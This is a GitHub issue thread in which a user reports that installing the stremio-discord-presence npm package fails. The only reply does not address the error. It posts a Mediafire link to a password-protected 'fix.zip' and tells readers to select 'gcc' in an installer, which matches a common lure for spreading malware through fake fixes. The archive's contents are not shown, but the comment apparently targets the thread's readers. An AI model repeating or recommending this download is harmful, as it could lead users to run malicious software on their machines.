### ISSUE TITLE
i cant install it 

### ISSUE THREAD

**Issue by nyouness** [snenenenenenene/stremio-rich-presence#1]
when running " npm install -g stremio-discord-presence " gives me this 
![Screenshot 2024-08-26 125106](https://github.com/user-attachments/assets/da5d9b13-f1bd-4814-b987-68e643f3998e)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
